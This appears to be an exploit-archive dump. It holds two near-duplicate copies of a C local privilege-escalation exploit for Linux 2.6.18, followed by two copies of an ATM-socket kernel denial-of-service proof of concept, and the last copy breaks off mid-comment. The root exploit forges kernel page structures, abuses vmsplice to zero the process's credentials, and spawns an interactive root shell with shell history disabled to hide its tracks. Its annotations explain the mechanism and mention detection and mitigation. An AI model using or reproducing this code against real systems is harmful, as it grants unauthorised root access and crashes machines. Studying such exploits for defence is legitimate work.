
DigitALL/Linux 2.6.18-20 2009 Local Root ( na)

# Author: DigitALL
# Version: 2.6.18-20
# Tested on: Linux System
# Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
# Code : The 2.6.18 exploit from 2008, edited into a 2009 version. I tested it on 2.6.18-20 (2009) Linux and it was rooted. Coming soon. By DigitALL

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS    16
#define PG_compound    14
#define uint        unsigned int
#define static_inline    static inline __attribute__((always_inline))
#define STACK(x)    (x + sizeof(x) - 40)

/*
 * User-space copy of the target kernel's struct page layout (the header
 * names 2.6.18).  main() fills instances of this inside anonymous mappings
 * so that kernel code following the forged page pointer presumably treats
 * it as a compound page and calls through the second entry's lru.next,
 * which main() points at kernel_code.  Field order and sizes are what make
 * that work and are kernel-version specific.
 */
struct page {
    unsigned long flags;                /* PG_* bits; main() sets PG_compound */
    int count;                          /* main() sets 1 on the head entry */
    int mapcount;
    unsigned long private;              /* main() points this at the entry itself */
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;    /* next is overwritten with kernel_code */
};

void    exit_code();              /* defined below: user-mode landing point after the forged iret, also the SIGPIPE handler */
char    exit_stack[1024 * 1024];  /* 1 MiB buffer that exit_kernel() installs as the user stack (see STACK()) before iret */

/*
 * Report a fatal error and terminate the process with status 1.
 *
 * @param msg  short description of the step that failed
 * @param err  errno value to append via strerror(), or 0 for none
 *
 * Only string literals are ever used as the printf() format; msg goes
 * through "%s".  Both streams are flushed so the message is not lost
 * when exit() runs.
 */
void    die(char *msg, int err)
{
    const char *reason = strerror(err);

    if (err) {
        printf("[-] %s: %s\n", msg, reason);
    } else {
        printf("[-] %s\n", msg);
    }
    fflush(stdout);
    fflush(stderr);
    exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice    316
#endif

#define USER_CS        0x73
#define USER_SS        0x7b
#define USER_FL        0x246

/*
 * Leave kernel mode by hand (i386): write a five-slot iret frame at the
 * top of the current stack — EIP = exit_code, CS, EFLAGS, ESP = top of
 * exit_stack (see STACK()), SS — using the hard-coded user selectors
 * above, then execute iret.  Called only from kernel_code(); never
 * returns.  Always inlined so no call frame sits between it and the
 * stack it rewrites.
 */
static_inline
void    exit_kernel()
{
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"    /* SS */
    "movl %1, 0x0c(%%esp) ;"    /* ESP */
    "movl %2, 0x08(%%esp) ;"    /* EFLAGS */
    "movl %3, 0x04(%%esp) ;"    /* CS */
    "movl %4, 0x00(%%esp) ;"    /* EIP */
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

/*
 * Return the word stored at the 8 KiB-aligned base of the current stack.
 * When this runs in kernel context that is the bottom of the kernel
 * stack, which on the 2.6.18-era layout is assumed to hold thread_info
 * with the task_struct pointer as its first word (that is how
 * kernel_code() uses the result — TODO confirm against the target).
 * NOTE(review): the asm writes EAX but does not list it as a clobber,
 * so the compiler is not told the register is destroyed.
 */
static_inline
void *    get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"          /* mask to the 8 KiB stack base */
    "movl (%%eax), %0"          /* first word at that base */
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice    278
#endif

#define USER_CS        0x23
#define USER_SS        0x2b
#define USER_FL        0x246

/*
 * Leave kernel mode by hand (x86_64).  swapgs swaps the GS base back
 * (presumably undoing the kernel's entry-time swapgs), then a five-slot
 * iretq frame is written at the top of the current stack — RIP =
 * exit_code, CS, RFLAGS, RSP = top of exit_stack (see STACK()), SS —
 * and iretq executes it.  Called only from kernel_code(); never returns.
 */
static_inline
void    exit_kernel()
{
    __asm__ __volatile__ (
    "swapgs ;"
    "movq %0, 0x20(%%rsp) ;"    /* SS */
    "movq %1, 0x18(%%rsp) ;"    /* RSP */
    "movq %2, 0x10(%%rsp) ;"    /* RFLAGS */
    "movq %3, 0x08(%%rsp) ;"    /* CS */
    "movq %4, 0x00(%%rsp) ;"    /* RIP */
    "iretq"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

/*
 * Return the quadword at offset 0 of the GS segment.  In kernel context
 * on the 2.6.18-era x86_64 layout this is assumed to be the per-CPU
 * `current` task pointer — TODO confirm against the target kernel.  The
 * value is only meaningful while kernel_code() executes in kernel mode.
 */
static_inline
void *    get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movq %%gs:(0), %0"
    : "=r" (curr)
    );
    return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice    __NR_vmsplice
/* Legacy glibc _syscall4() macro: emits a _vmsplice() wrapper that issues
 * syscall number __NR__vmsplice.  Only used when the toolchain still
 * provides _syscall4; otherwise the syscall(2) fallback below is used. */
_syscall4(
    long, _vmsplice,
    int, fd,
    struct iovec *, iov,
    unsigned long, nr_segs,
    unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)    syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

/* Caller's real uid/gid, captured in main(); kernel_code() searches the
 * task_struct for four consecutive copies of each. */
static uint uid, gid;

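/*
 * Payload that runs in kernel context once the forged page structure's
 * lru.next is followed (see main()).  It locates the caller's credentials
 * in the task_struct by pattern — four consecutive 32-bit words equal to
 * uid followed by four equal to gid (presumably uid/euid/suid/fsuid and
 * the gid quartet) — and zeroes them.  The three words one pointer past
 * that block are then set to all-ones (presumably a capability set; the
 * layout is 2.6.18-specific and not verified here).  Control returns to
 * user mode through exit_kernel().
 *
 * At most 1024-13 words are scanned.  If nothing matches the function
 * still calls exit_kernel() with credentials untouched, and exit_code()
 * then reports "wtf".
 *
 * Fix relative to the page copy: the HTML-escaped `&amp;&amp;` operators
 * are restored to `&&` so the block compiles.
 */
void    kernel_code()
{
    int    i;
    uint    *p = get_current();

    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid &&
            p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid &&
            p[6] == gid && p[7] == gid) {
            /* eight id words -> 0 (root) */
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            /* skip one pointer-sized field, then three words -> ~0 */
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }

    exit_kernel();
}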

/*
 * User-mode landing point.  Reached two ways: as the target of the iret
 * in exit_kernel() (running on exit_stack), and as the SIGPIPE handler
 * installed in main() — the pipe's read end is closed before vmsplice(),
 * so a write that completes normally presumably raises SIGPIPE and lands
 * here as well.  If the process is not root the attempt failed ("wtf");
 * otherwise an interactive bash is exec'd with HISTFILE=/dev/null so the
 * shell records no history.  The final die() is reached only if execl()
 * fails.
 *
 * Detection note: an interactive shell started from a signal handler
 * with HISTFILE=/dev/null in its environment is a distinctive
 * process-lineage/environment pair for endpoint monitoring.
 */
void    exit_code()
{
    if (getuid() != 0)
        die("wtf", 0);

    printf("[+] root\n");
    putenv("HISTFILE=/dev/null");
    execl("/bin/bash", "bash", "-i", NULL);
    die("/bin/bash", errno);
}

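/*
 * Entry point.  Stages the fake page structures and the source buffer,
 * then calls vmsplice() with an unbounded iovec.  Every mmap()/munmap()/
 * pipe() result is checked; any failure ends in die().
 *
 * Address trick: `*(void **) &(int[2]){a, b}` reinterprets two ints as
 * one pointer, so the resulting address depends on pointer width (32-bit:
 * a; little-endian 64-bit: a | b << 32).  The staging relies on fixed,
 * low addresses; on kernels that enforce mmap_min_addr the MAP_FIXED
 * calls presumably fail here, which is the mitigation that stops this
 * step before any kernel bug is reached.
 *
 * Sequence:
 *  1. Map a page at pages[0]; describe pages[0]/pages[1] as a compound
 *     page whose second entry's lru.next is kernel_code.
 *  2. Read the first word of pages[0] (its flags field, just set to
 *     1 << PG_compound) as the next address, map it, repeat the set-up
 *     for pages[2]/pages[3].
 *  3. Map one more page at pages[4], derived from {PAGE_SIZE, 0}.
 *  4. Map (PIPE_BUFFERS * 3 + 2) pages, shrink the logical size by two
 *     pages and unmap the page just past that, leaving a hole before the
 *     final page.
 *  5. Open a pipe, close its read end, install exit_code as the SIGPIPE
 *     handler and vmsplice() the buffer with iov_len = ULONG_MAX.
 *
 * Returns 0 only if execution falls through, which never happens: the
 * process leaves via exit_code() or die().
 *
 * Fixes relative to the page copy: HTML-escaped `&amp;` restored to `&`,
 * and pointer arguments to the 0x%lx conversions are cast to unsigned
 * long so format and argument types agree (output is unchanged).
 */
int    main(int argc, char *argv[])
{
    int        pi[2];
    size_t        map_size;
    char *        map_addr;
    struct iovec    iov;
    struct page *    pages[5];

    /* Capture the caller's ids for kernel_code() to search for, and set
     * real/effective/saved to the same value (presumably so the
     * task_struct holds four identical uid and four identical gid words). */
    uid = getuid();
    gid = getgid();
    setresuid(uid, uid, uid);
    setresgid(gid, gid, gid);

    printf("-----------------------------------\n");
    printf(" Linux 2.6.18-20 2009 Local Root Exploit\n");
    printf(" By DigitALL\n");
    printf("-----------------------------------\n");

    /* refuse to run as uid 0 or gid 0 (the search pattern would be zeros) */
    if (!uid || !gid)
        die("!@#$", 0);

    /***** first fake compound page: pages[0] (head), pages[1] (tail) */
    pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
    pages[1] = pages[0] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", (unsigned long) map_addr,
           (unsigned long) (map_addr + map_size));
    printf("[+] page: 0x%lx\n", (unsigned long) pages[0]);
    printf("[+] page: 0x%lx\n", (unsigned long) pages[1]);

    pages[0]->flags    = 1 << PG_compound;
    pages[0]->private  = (unsigned long) pages[0];
    pages[0]->count    = 1;
    pages[1]->lru.next = (long) kernel_code;    /* kernel-side call target */

    /***** second fake compound page, at the address formed by the first
     * word of pages[0] (its flags, i.e. 1 << PG_compound) */
    pages[2] = *(void **) pages[0];
    pages[3] = pages[2] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", (unsigned long) map_addr,
           (unsigned long) (map_addr + map_size));
    printf("[+] page: 0x%lx\n", (unsigned long) pages[2]);
    printf("[+] page: 0x%lx\n", (unsigned long) pages[3]);

    pages[2]->flags    = 1 << PG_compound;
    pages[2]->private  = (unsigned long) pages[2];
    pages[2]->count    = 1;
    pages[3]->lru.next = (long) kernel_code;

    /***** one more page at the address formed from {PAGE_SIZE, 0} */
    pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", (unsigned long) map_addr,
           (unsigned long) (map_addr + map_size));
    printf("[+] page: 0x%lx\n", (unsigned long) pages[4]);

    /***** source buffer for the iovec: (PIPE_BUFFERS * 3 + 2) pages */
    map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
    map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", (unsigned long) map_addr,
           (unsigned long) (map_addr + map_size));

    /***** drop the second-to-last page: a hole before the final page */
    map_size -= 2 * PAGE_SIZE;
    if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
        die("munmap", errno);

    /***** trigger: pipe with its read end already closed, iovec claiming
     * ULONG_MAX bytes from the buffer; exit_code() is the SIGPIPE handler */
    if (pipe(pi) < 0) die("pipe", errno);
    close(pi[0]);

    iov.iov_base = map_addr;
    iov.iov_len  = ULONG_MAX;

    signal(SIGPIPE, exit_code);
    _vmsplice(pi[1], &iov, 1, 0);
    die("vmsplice", errno);    /* reached only if the syscall returns */
    return 0;
}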



Linux kernel 2.6.18-20 2009 local root exploit.

DigitALL/2.6.18-20 2009 Local Root Exploit ( linux)

# Author: DigitALL
# Version: 2.6.18-20
# Tested on: Linux System
# Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
# Code : The 2.6.18 exploit from 2008, edited into a 2009 version. I tested it on 2.6.18-20 (2009) Linux and it was rooted. Coming soon. By DigitALL

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS    16
#define PG_compound    14
#define uint        unsigned int
#define static_inline    static inline __attribute__((always_inline))
#define STACK(x)    (x + sizeof(x) - 40)

/*
 * User-space copy of the target kernel's struct page layout (the header
 * names 2.6.18).  main() fills instances of this inside anonymous mappings
 * so that kernel code following the forged page pointer presumably treats
 * it as a compound page and calls through the second entry's lru.next,
 * which main() points at kernel_code.  Field order and sizes are what make
 * that work and are kernel-version specific.
 */
struct page {
    unsigned long flags;                /* PG_* bits; main() sets PG_compound */
    int count;                          /* main() sets 1 on the head entry */
    int mapcount;
    unsigned long private;              /* main() points this at the entry itself */
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;    /* next is overwritten with kernel_code */
};

void    exit_code();              /* defined below: user-mode landing point after the forged iret, also the SIGPIPE handler */
char    exit_stack[1024 * 1024];  /* 1 MiB buffer that exit_kernel() installs as the user stack (see STACK()) before iret */

/*
 * Report a fatal error and terminate the process with status 1.
 *
 * @param msg  short description of the step that failed
 * @param err  errno value to append via strerror(), or 0 for none
 *
 * Only string literals are ever used as the printf() format; msg goes
 * through "%s".  Both streams are flushed so the message is not lost
 * when exit() runs.
 */
void    die(char *msg, int err)
{
    const char *reason = strerror(err);

    if (err) {
        printf("[-] %s: %s\n", msg, reason);
    } else {
        printf("[-] %s\n", msg);
    }
    fflush(stdout);
    fflush(stderr);
    exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice    316
#endif

#define USER_CS        0x73
#define USER_SS        0x7b
#define USER_FL        0x246

/*
 * Leave kernel mode by hand (i386): write a five-slot iret frame at the
 * top of the current stack — EIP = exit_code, CS, EFLAGS, ESP = top of
 * exit_stack (see STACK()), SS — using the hard-coded user selectors
 * above, then execute iret.  Called only from kernel_code(); never
 * returns.  Always inlined so no call frame sits between it and the
 * stack it rewrites.
 */
static_inline
void    exit_kernel()
{
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"    /* SS */
    "movl %1, 0x0c(%%esp) ;"    /* ESP */
    "movl %2, 0x08(%%esp) ;"    /* EFLAGS */
    "movl %3, 0x04(%%esp) ;"    /* CS */
    "movl %4, 0x00(%%esp) ;"    /* EIP */
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

/*
 * Return the word stored at the 8 KiB-aligned base of the current stack.
 * When this runs in kernel context that is the bottom of the kernel
 * stack, which on the 2.6.18-era layout is assumed to hold thread_info
 * with the task_struct pointer as its first word (that is how
 * kernel_code() uses the result — TODO confirm against the target).
 * NOTE(review): the asm writes EAX but does not list it as a clobber,
 * so the compiler is not told the register is destroyed.
 */
static_inline
void *    get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"          /* mask to the 8 KiB stack base */
    "movl (%%eax), %0"          /* first word at that base */
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice    278
#endif

#define USER_CS        0x23
#define USER_SS        0x2b
#define USER_FL        0x246

/*
 * Leave kernel mode by hand (x86_64).  swapgs swaps the GS base back
 * (presumably undoing the kernel's entry-time swapgs), then a five-slot
 * iretq frame is written at the top of the current stack — RIP =
 * exit_code, CS, RFLAGS, RSP = top of exit_stack (see STACK()), SS —
 * and iretq executes it.  Called only from kernel_code(); never returns.
 */
static_inline
void    exit_kernel()
{
    __asm__ __volatile__ (
    "swapgs ;"
    "movq %0, 0x20(%%rsp) ;"    /* SS */
    "movq %1, 0x18(%%rsp) ;"    /* RSP */
    "movq %2, 0x10(%%rsp) ;"    /* RFLAGS */
    "movq %3, 0x08(%%rsp) ;"    /* CS */
    "movq %4, 0x00(%%rsp) ;"    /* RIP */
    "iretq"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

/*
 * Return the quadword at offset 0 of the GS segment.  In kernel context
 * on the 2.6.18-era x86_64 layout this is assumed to be the per-CPU
 * `current` task pointer — TODO confirm against the target kernel.  The
 * value is only meaningful while kernel_code() executes in kernel mode.
 */
static_inline
void *    get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movq %%gs:(0), %0"
    : "=r" (curr)
    );
    return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice    __NR_vmsplice
/* Legacy glibc _syscall4() macro: emits a _vmsplice() wrapper that issues
 * syscall number __NR__vmsplice.  Only used when the toolchain still
 * provides _syscall4; otherwise the syscall(2) fallback below is used. */
_syscall4(
    long, _vmsplice,
    int, fd,
    struct iovec *, iov,
    unsigned long, nr_segs,
    unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)    syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

/* Caller's real uid/gid, captured in main(); kernel_code() searches the
 * task_struct for four consecutive copies of each. */
static uint uid, gid;

/*
 * Payload that runs in kernel context once the forged page structure's
 * lru.next is followed (see main()).  It locates the caller's credentials
 * in the task_struct by pattern — four consecutive 32-bit words equal to
 * uid followed by four equal to gid (presumably uid/euid/suid/fsuid and
 * the gid quartet) — and zeroes them.  The three words one pointer past
 * that block are then set to all-ones (presumably a capability set; the
 * layout is 2.6.18-specific and not verified here).  Control returns to
 * user mode through exit_kernel().
 *
 * At most 1024-13 words are scanned.  If nothing matches the function
 * still calls exit_kernel() with credentials untouched, and exit_code()
 * then reports "wtf".
 */
void    kernel_code()
{
    int    i;
    uint    *p = get_current();

    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid &&
            p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid &&
            p[6] == gid && p[7] == gid) {
            /* eight id words -> 0 (root) */
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            /* skip one pointer-sized field, then three words -> ~0 */
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }

    exit_kernel();
}

/*
 * User-mode landing point.  Reached two ways: as the target of the iret
 * in exit_kernel() (running on exit_stack), and as the SIGPIPE handler
 * installed in main() — the pipe's read end is closed before vmsplice(),
 * so a write that completes normally presumably raises SIGPIPE and lands
 * here as well.  If the process is not root the attempt failed ("wtf");
 * otherwise an interactive bash is exec'd with HISTFILE=/dev/null so the
 * shell records no history.  The final die() is reached only if execl()
 * fails.
 *
 * Detection note: an interactive shell started from a signal handler
 * with HISTFILE=/dev/null in its environment is a distinctive
 * process-lineage/environment pair for endpoint monitoring.
 */
void    exit_code()
{
    if (getuid() != 0)
        die("wtf", 0);

    printf("[+] root\n");
    putenv("HISTFILE=/dev/null");
    execl("/bin/bash", "bash", "-i", NULL);
    die("/bin/bash", errno);
}

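/*
 * Entry point.  Stages the fake page structures and the source buffer,
 * then calls vmsplice() with an unbounded iovec.  Every mmap()/munmap()/
 * pipe() result is checked; any failure ends in die().
 *
 * Address trick: `*(void **) &(int[2]){a, b}` reinterprets two ints as
 * one pointer, so the resulting address depends on pointer width (32-bit:
 * a; little-endian 64-bit: a | b << 32).  The staging relies on fixed,
 * low addresses; on kernels that enforce mmap_min_addr the MAP_FIXED
 * calls presumably fail here, which is the mitigation that stops this
 * step before any kernel bug is reached.
 *
 * Sequence:
 *  1. Map a page at pages[0]; describe pages[0]/pages[1] as a compound
 *     page whose second entry's lru.next is kernel_code.
 *  2. Read the first word of pages[0] (its flags field, just set to
 *     1 << PG_compound) as the next address, map it, repeat the set-up
 *     for pages[2]/pages[3].
 *  3. Map one more page at pages[4], derived from {PAGE_SIZE, 0}.
 *  4. Map (PIPE_BUFFERS * 3 + 2) pages, shrink the logical size by two
 *     pages and unmap the page just past that, leaving a hole before the
 *     final page.
 *  5. Open a pipe, close its read end, install exit_code as the SIGPIPE
 *     handler and vmsplice() the buffer with iov_len = ULONG_MAX.
 *
 * Returns 0 only if execution falls through, which never happens: the
 * process leaves via exit_code() or die().
 *
 * Fix: pointer arguments to the 0x%lx conversions are cast to unsigned
 * long so format and argument types agree (output is unchanged).
 */
int    main(int argc, char *argv[])
{
    int        pi[2];
    size_t        map_size;
    char *        map_addr;
    struct iovec    iov;
    struct page *    pages[5];

    /* Capture the caller's ids for kernel_code() to search for, and set
     * real/effective/saved to the same value (presumably so the
     * task_struct holds four identical uid and four identical gid words). */
    uid = getuid();
    gid = getgid();
    setresuid(uid, uid, uid);
    setresgid(gid, gid, gid);

    printf("-----------------------------------\n");
    printf(" Linux 2.6.18-20 2009 Local Root Exploit\n");
    printf(" By DigitALL\n");
    printf("-----------------------------------\n");

    /* refuse to run as uid 0 or gid 0 (the search pattern would be zeros) */
    if (!uid || !gid)
        die("!@#$", 0);

    /***** first fake compound page: pages[0] (head), pages[1] (tail) */
    pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
    pages[1] = pages[0] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", (unsigned long) map_addr,
           (unsigned long) (map_addr + map_size));
    printf("[+] page: 0x%lx\n", (unsigned long) pages[0]);
    printf("[+] page: 0x%lx\n", (unsigned long) pages[1]);

    pages[0]->flags    = 1 << PG_compound;
    pages[0]->private  = (unsigned long) pages[0];
    pages[0]->count    = 1;
    pages[1]->lru.next = (long) kernel_code;    /* kernel-side call target */

    /***** second fake compound page, at the address formed by the first
     * word of pages[0] (its flags, i.e. 1 << PG_compound) */
    pages[2] = *(void **) pages[0];
    pages[3] = pages[2] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", (unsigned long) map_addr,
           (unsigned long) (map_addr + map_size));
    printf("[+] page: 0x%lx\n", (unsigned long) pages[2]);
    printf("[+] page: 0x%lx\n", (unsigned long) pages[3]);

    pages[2]->flags    = 1 << PG_compound;
    pages[2]->private  = (unsigned long) pages[2];
    pages[2]->count    = 1;
    pages[3]->lru.next = (long) kernel_code;

    /***** one more page at the address formed from {PAGE_SIZE, 0} */
    pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", (unsigned long) map_addr,
           (unsigned long) (map_addr + map_size));
    printf("[+] page: 0x%lx\n", (unsigned long) pages[4]);

    /***** source buffer for the iovec: (PIPE_BUFFERS * 3 + 2) pages */
    map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
    map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", (unsigned long) map_addr,
           (unsigned long) (map_addr + map_size));

    /***** drop the second-to-last page: a hole before the final page */
    map_size -= 2 * PAGE_SIZE;
    if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
        die("munmap", errno);

    /***** trigger: pipe with its read end already closed, iovec claiming
     * ULONG_MAX bytes from the buffer; exit_code() is the SIGPIPE handler */
    if (pipe(pi) < 0) die("pipe", errno);
    close(pi[0]);

    iov.iov_base = map_addr;
    iov.iov_len  = ULONG_MAX;

    signal(SIGPIPE, exit_code);
    _vmsplice(pi[1], &iov, 1, 0);
    die("vmsplice", errno);    /* reached only if the syscall returns */
    return 0;
}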



Adurit-T/Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Local DoS Exploit ( linux)

/*

Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Denial of service Exploit

Vuln : 2.6.27.7-generic || 2.6.18 || 2.6.24-1

Author : Adurit team
             >>djekmani4ever

Home : Hightsec.com

patch : http://marc.info/?l=linux-netdev&m=122841256115780&w=2

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h> 
                      
#define NUM_CPUS 8    
#define ATM "/proc/net/atm/avc"
                              
/*
 * Entry point of the ATM socket denial-of-service PoC (the fix is linked
 * in the header comment).  Steps: create a PF_ATMSVC datagram socket, set
 * a UBR / no-AAL QoS on it, bind an all-zero AF_ATMSVC address, call
 * listen() twice, fork a chain of up to NUM_CPUS-1 processes (each parent
 * leaves the loop after one fork; each child keeps forking), then have
 * every process in the chain read the ATM proc file once.  Which step
 * trips the kernel bug is not stated here; the patch URL above is the
 * authoritative description.
 *
 * Review notes (no behaviour change): socket(), bind(), listen(), open()
 * and read() results are unchecked — only setsockopt() is; `err` is never
 * used; `&adurit` is a pointer to the whole array where plain `adurit`
 * (decaying to char *) is the conventional argument.  Mitigation is the
 * kernel fix; hosts that do not use ATM presumably avoid exposure by not
 * loading the ATM protocol modules (confirm against the patch).
 */
int
main(void)
{
    char *err, adurit[2000];
    int i, ret, sock, proc;
    struct atm_qos dj;
    struct sockaddr_atmsvc addr;



    sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);


    /* unspecified-bit-rate QoS with no AAL in both directions */
    memset(&dj, 0, sizeof(dj));
    dj.rxtp.traffic_class = ATM_UBR;
    dj.txtp.traffic_class = ATM_UBR;
    dj.aal = ATM_NO_AAL;


    ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &dj, sizeof(dj));
    if (ret == -1) {
        printf("failed !\n");
        return 1;
    }
    memset(&addr, 0, sizeof(addr));
    addr.sas_family = AF_ATMSVC;

    bind(sock, (struct sockaddr *) &addr, sizeof(addr));

    /* listen() is issued twice on the same socket (presumably part of the trigger) */
    listen(sock, 10);
    listen(sock, 10);

    /* fork chain: the parent breaks after one fork, each child forks again */
    for (i = 1; i < NUM_CPUS; ++i) {
        if (fork() != 0) {
            break;
        }
    }
    /* every process in the chain reads the proc file once */
    proc = open(ATM, O_RDONLY);
    ret = read(proc, &adurit, 2000);
    close(proc);

    return 0;
}

// milw0rm.com [2008-12-14]


Adurit-T/Linux Kernel 2.6.27-7-generic Denial Of Service ( na)

/*                      
Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Dos Exploit
original idea : Jon Oberheide
http://www.milw0rm.com/exploits/7405
tested : 2.6.27.7-generic - 2.6.18 - 2.6.24-1                       
by :  ADU-T                                                         
patching :
http://marc.info/?l=linux-netdev&m=122841256115780&w=2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h> 

#define NUM_CPUS 8    
#define ATM "/proc/net/atm/avc"

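/*
 * Entry point of the ATM socket denial-of-service PoC (the fix is linked
 * in the header comment).  Steps: create a PF_ATMSVC datagram socket, set
 * a UBR / no-AAL QoS on it, bind an all-zero AF_ATMSVC address, call
 * listen() twice, fork a chain of up to NUM_CPUS-1 processes (each parent
 * leaves the loop after one fork; each child keeps forking), then have
 * every process in the chain read the ATM proc file once.  Which step
 * trips the kernel bug is not stated here; the patch URL above is the
 * authoritative description.
 *
 * Review notes (no behaviour change): socket(), bind(), listen(), open()
 * and read() results are unchecked — only setsockopt() is; `err` is never
 * used; `&adurit` is a pointer to the whole array where plain `adurit`
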